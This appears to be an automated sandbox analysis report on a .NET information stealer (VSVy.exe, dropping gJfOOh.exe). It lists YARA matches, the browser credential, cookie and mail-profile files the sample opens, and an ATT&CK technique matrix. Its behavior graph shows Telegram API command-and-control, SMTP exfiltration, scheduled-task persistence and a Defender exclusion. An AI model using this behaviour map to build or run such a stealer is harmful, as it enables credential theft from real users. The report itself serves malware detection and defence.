              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Users\user\Desktop\VSVy.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeQueries volume information: C:\Users\user\AppData\Roaming\gJfOOh.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeQueries volume information: C:\Users\user\AppData\Roaming\gJfOOh.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\VSVy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.3899379184.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: VSVy.exe PID: 6208, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: gJfOOh.exe PID: 3228, type: MEMORYSTR
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000010.00000002.3899379679.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: gJfOOh.exe PID: 3228, type: MEMORYSTR
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\VSVy.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: Yara matchFile source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000010.00000002.3903689735.000000000304D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3899379184.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: VSVy.exe PID: 6208, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: gJfOOh.exe PID: 3228, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.3899379184.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: VSVy.exe PID: 6208, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: gJfOOh.exe PID: 3228, type: MEMORYSTR
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000010.00000002.3899379679.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: VSVy.exe PID: 764, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: gJfOOh.exe PID: 4160, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: gJfOOh.exe PID: 3228, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Scheduled Task/Job
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              File and Directory Discovery
              Remote Services11
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scheduled Task/Job
              111
              Process Injection
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory13
              System Information Discovery
              Remote Desktop Protocol1
              Data from Local System
              3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Scheduled Task/Job
              3
              Obfuscated Files or Information
              Security Account Manager11
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook32
              Software Packing
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture1
              Non-Standard Port
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets31
              Virtualization/Sandbox Evasion
              SSHKeylogging3
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input Capture24
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
              Virtualization/Sandbox Evasion
              DCSync1
              System Network Configuration Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
              Process Injection
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1618710 Sample: VSVy.exe Startdate: 19/02/2025 Architecture: WINDOWS Score: 100 48 reallyfreegeoip.org 2->48 50 api.telegram.org 2->50 52 3 other IPs or domains 2->52 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 70 10 other signatures 2->70 8 VSVy.exe 7 2->8         started        12 gJfOOh.exe 5 2->12         started        signatures3 66 Tries to detect the country of the analysis system (by using the IP) 48->66 68 Uses the Telegram API (likely for C&C communication) 50->68 process4 file5 40 C:\Users\user\AppData\Roaming\gJfOOh.exe, PE32 8->40 dropped 42 C:\Users\user\...\gJfOOh.exe:Zone.Identifier, ASCII 8->42 dropped 44 C:\Users\user\AppData\Local\...\tmp337E.tmp, XML 8->44 dropped 46 C:\Users\user\AppData\Local\...\VSVy.exe.log, ASCII 8->46 dropped 72 Detected unpacking (changes PE section rights) 8->72 74 Detected unpacking (overwrites its own PE header) 8->74 76 Uses schtasks.exe or at.exe to add and modify task schedules 8->76 78 Adds a directory exclusion to Windows Defender 8->78 14 VSVy.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        80 Multi AV Scanner detection for dropped file 12->80 82 Injects a PE file into a foreign processes 12->82 24 gJfOOh.exe 12->24         started        26 schtasks.exe 12->26         started        28 gJfOOh.exe 12->28         started        signatures6 process7 dnsIp8 54 mail.gemssystems.com 50.116.88.120, 49812, 49950, 587 UNIFIEDLAYER-AS-1US United States 14->54 56 api.telegram.org 149.154.167.220, 443, 49780, 49908 TELEGRAMRU United Kingdom 14->56 58 2 other IPs or domains 14->58 84 Loading BitLocker PowerShell Module 18->84 30 conhost.exe 18->30         started        32 WmiPrvSE.exe 18->32         started        34 conhost.exe 20->34         started        36 conhost.exe 22->36         started        86 Tries to steal Mail credentials (via file / registry access) 24->86 88 Tries to harvest and steal browser information (history, passwords, etc) 24->88 38 conhost.exe 26->38         started        signatures9 process10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.